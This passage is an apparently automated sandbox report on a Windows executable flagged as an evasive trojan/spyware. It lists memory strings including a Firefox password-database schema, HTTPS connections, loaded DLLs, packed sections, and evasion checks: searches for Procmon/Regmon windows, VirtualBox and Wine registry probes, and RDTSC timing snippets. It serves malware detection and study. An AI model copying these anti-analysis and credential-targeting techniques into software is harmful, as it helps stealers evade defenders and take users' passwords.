Source: TmmiCE5Ulm.exe, 00000000.00000003.2156635804.0000000005AC1000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156755347.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156870694.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409381050.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688182205.00000000011A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repository/0
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: TmmiCE5Ulm.exe, 00000000.00000003.2156635804.0000000005AC1000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156755347.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156870694.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.000000000118B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.000000000118B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.000000000118B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: TmmiCE5Ulm.exe, 00000000.00000003.2206287989.0000000005DA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: TmmiCE5Ulm.exe, 00000000.00000003.2206287989.0000000005DA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: TmmiCE5Ulm.exe, 00000000.00000003.2206287989.0000000005DA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: TmmiCE5Ulm.exe, 00000000.00000003.2206287989.0000000005DA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: TmmiCE5Ulm.exe, 00000000.00000003.2206287989.0000000005DA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: TmmiCE5Ulm.exe, 00000000.00000003.2206287989.0000000005DA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.000000000118B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.5:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 3.5.16.86:443 -> 192.168.2.5:49745 version: TLS 1.2

System Summary

barindex
Source: TmmiCE5Ulm.exe Static PE information: section name:
Source: TmmiCE5Ulm.exe Static PE information: section name: .rsrc
Source: TmmiCE5Ulm.exe Static PE information: section name: .idata
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_011A8788 0_3_011A8788
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0112AB7E 0_3_0112AB7E
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0112AB7E 0_3_0112AB7E
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5600 -s 1924
Source: TmmiCE5Ulm.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: TmmiCE5Ulm.exe Static PE information: Section: ZLIB complexity 0.997431506849315
Source: TmmiCE5Ulm.exe Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@2/5@13/4
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5600
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\225c3a85-9a0a-401e-8fa4-34f6b7a66a76 Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: TmmiCE5Ulm.exe, 00000000.00000003.2181566984.0000000005A93000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2157894493.0000000005A92000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2157090654.0000000005AAC000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2181566984.0000000005B25000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: TmmiCE5Ulm.exe ReversingLabs: Detection: 57%
Source: TmmiCE5Ulm.exe Virustotal: Detection: 69%
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File read: C:\Users\user\Desktop\TmmiCE5Ulm.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\TmmiCE5Ulm.exe "C:\Users\user\Desktop\TmmiCE5Ulm.exe"
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5600 -s 1924
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: TmmiCE5Ulm.exe Static file information: File size 2934784 > 1048576
Source: TmmiCE5Ulm.exe Static PE information: Raw size of wlptngjz is bigger than: 0x100000 < 0x2a4800

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Unpacked PE file: 0.2.TmmiCE5Ulm.exe.6f0000.0.unpack :EW;.rsrc :W;.idata :W;wlptngjz:EW;nuxtdfjk:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;wlptngjz:EW;nuxtdfjk:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: TmmiCE5Ulm.exe Static PE information: real checksum: 0x2cd7fe should be: 0x2d7788
Source: TmmiCE5Ulm.exe Static PE information: section name:
Source: TmmiCE5Ulm.exe Static PE information: section name: .rsrc
Source: TmmiCE5Ulm.exe Static PE information: section name: .idata
Source: TmmiCE5Ulm.exe Static PE information: section name: wlptngjz
Source: TmmiCE5Ulm.exe Static PE information: section name: nuxtdfjk
Source: TmmiCE5Ulm.exe Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_011A9D05 push esi; retf 0_3_011A9D08
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_011AB336 pushad ; iretd 0_3_011AB36D
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_011A9887 push FFFFFFDBh; iretd 0_3_011A9898
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0112C35E pushad ; ret 0_3_0112C361
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0112C35E pushad ; ret 0_3_0112C361
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0112CB7C push 78011A40h; retf 0_3_0112CB91
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0112CB7C push 78011A40h; retf 0_3_0112CB91
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0112C362 pushad ; ret 0_3_0112C365
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0112C362 pushad ; ret 0_3_0112C365
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0112C366 push 680112C3h; ret 0_3_0112C36D
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0112C366 push 680112C3h; ret 0_3_0112C36D
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_01132FC1 push esi; iretd 0_3_01132FC2
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_01132FC1 push esi; iretd 0_3_01132FC2
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0118C350 push eax; ret 0_3_0118C351
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0118C350 push eax; ret 0_3_0118C351
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0118C354 push eax; ret 0_3_0118C355
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0118C354 push eax; ret 0_3_0118C355
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_01117077 push eax; iretd 0_3_011170A5
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0115ADB3 pushad ; ret 0_3_0115ADD1
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0115ADB3 pushad ; ret 0_3_0115ADD1
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0118C350 push eax; ret 0_3_0118C351
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0118C350 push eax; ret 0_3_0118C351
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0118C354 push eax; ret 0_3_0118C355
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0118C354 push eax; ret 0_3_0118C355
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0112C35E pushad ; ret 0_3_0112C361
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0112C35E pushad ; ret 0_3_0112C361
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0112CB7C push 78011A40h; retf 0_3_0112CB91
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0112CB7C push 78011A40h; retf 0_3_0112CB91
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0112C362 pushad ; ret 0_3_0112C365
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0112C362 pushad ; ret 0_3_0112C365
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0112C366 push 680112C3h; ret 0_3_0112C36D
Source: TmmiCE5Ulm.exe Static PE information: section name: entropy: 7.98239541875244

Boot Survival

barindex
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 747FE3 second address: 747FF5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F05F0F59496h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F05F0F59496h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 747FF5 second address: 748002 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8B0A40 second address: 8B0A46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8B0A46 second address: 8B0A4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe RDTSC instruction interceptor: First address: 8B0A4C second address: 8B0A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
